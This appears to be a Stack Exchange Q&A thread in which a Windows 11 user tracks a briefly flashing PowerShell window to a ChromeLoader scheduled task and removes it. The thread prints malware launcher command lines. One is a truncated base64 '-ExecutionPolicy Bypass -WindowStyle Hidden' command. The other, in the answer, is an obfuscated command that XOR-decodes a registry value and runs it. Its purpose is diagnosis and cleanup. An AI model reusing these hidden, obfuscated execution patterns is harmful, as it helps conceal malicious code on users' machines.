# Windows PowerShell randomly opening for a split second

Tags: windows, powershell, windows-11

I'm having this weird issue ever since I upgraded to Windows 11. Randomly, every few minutes, I have a window that open and close in a split second. It doesn't looks like much, and usually not a big deal. But then it happens when I'm gaming. It makes me lose focus on the game windows, and causes a little visual lag, and once in a while that happens in a action moment. Really really annoying. I couldn't catch what program that was,
[so I used a recording software to try and catch it.](https://i.stack.imgur.com/Nlxwh.gif) Surprisingly enough it worked, after only 2 mins of recording. Turns out it's the windows powershell. Now, I have no idea why that happens, or how to make it stop. Does anyone have a clue and could help me ?

[Powershell in event viewer be like](https://i.stack.imgur.com/cJ1My.png) (Traductions : Cycle de vie du moteur = Engine's Lifecyle, Cycle de vie du fournisseur = Provider's Lifecycle)
Everytime it happens, there is 8 new entries, 6 provider's Lifecycle, and 2 engine's LifeCycle

Edit : I noticed that the event happens exactly every 5 minutes, at XX:X0 and XX:X5. Using the Sysinternal Process Monitor as someone adviced,  [I got this everytime it happens.](https://i.stack.imgur.com/hHDWh.png) (It goes for longer, there is a lot of lines)
The very first line [looks like that when I open it](https://i.stack.imgur.com/xjXwl.png)

Edit 2 : Using a base64 decoder, I translated the "token" in the commande that opens powershell, that turns out to be [this code](https://i.stack.imgur.com/ld7bl.png)

I checked in my appdata/local folder, which had the chrome folder (Google Chrome is not installed on my computer), as well as the archive.zip file. Both contains the [same files](https://i.stack.imgur.com/1J7Sp.png)

Looks like an app of some kind.

Edit 3 : I also try to climb up the process ladder, using the parent PID of the powershell process. His direct parent [is a cmd.EXE process](https://i.stack.imgur.com/nLUzk.png).

And that process parent is [svchost.exe.](https://i.stack.imgur.com/0Tc3l.png) And now I'm lost, as this seems to be an important windows process, totally legit, so I have no clue where to look next

Edit 4 : I think I got it. There was a task in the task planifier, called ChromeLoader, that triggered every 5 minutes, and did the command I found. I deleted it, though it was probably a virus. Will probably follow through the recommandation and reset my computer soon.
Thanks everyone for your help.

Comment: Use Autoruns to find the offending application (registry entry) launching PowerShell

Comment: Sysinternals Process Monitor can be used to monitor all process creations so you should get the command-line of the powershell that is executed and the parent process ID (the process that was executing it). In Process Monitor disable all categories except "Process and Tread activity" disable especially File and Registry activity as these event occur very frequently).

Comment: I manage to climb up the ladder a bit. The powershell event's parent is a cmd.exe,whose parent is svchost.exe. I read that it's an important windows process, and so, not sure what I can do about it

Comment: turn on powershell scriptblock logging ... that will let you see the actual code that is running. >>> about Logging Windows - PowerShell | Microsoft Docs — https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.2 <<< ///// however, the sysinternals Process Monitor util can record things over a timespan. so that also should let you find the thing that is being run.

Comment: Using the process monitor, every time it happens, (exactly every 5 minutes I just noticed), I find that the event has this command : `powershell  -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKAAoAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAHgAdABQAGEAdABoACkAKQB7AAoACgAJACQAYQByAGMAaABpAHYAZQBOAG...` I shortened it, because the whole line is too long to fit in a comment, but it's just more of that token or whatever it is

Comment: svchost is a just a regular process host for Windows. As it does mentioned scheduling check your task planner tasks.

Comment: At this point a Reset is likely your best bet to cleanse the malicious file

Comment: @PyBu I would suggest you post an answer to your question with the steps you performed and the outcome.

Answer (score 1):

In my case, I found a process in Task Scheduler. It is called `07D1FBB5-C577-4E4D-97A8-9934E77D9340`

with a location of `\Microsoft\Windows\Management\Provisioning\ptxALyM`

It has a really strange Action that starts Powershell with strange arguments:

[image]

Full arguments line:

```
-winDoWStyle hidDEn -commAND "ICM ([sCripTBLOCK]::crEAte([stRINg]::jOIn('', ((GeT-ITeMpRoPERTy -pATh 'hkLm:\sOftWAre\InTelPTXALYm').'ptxAlymzN' | % { [Char]($_ -BxOR 243) }))))"
```

Just delete the task and enjoy!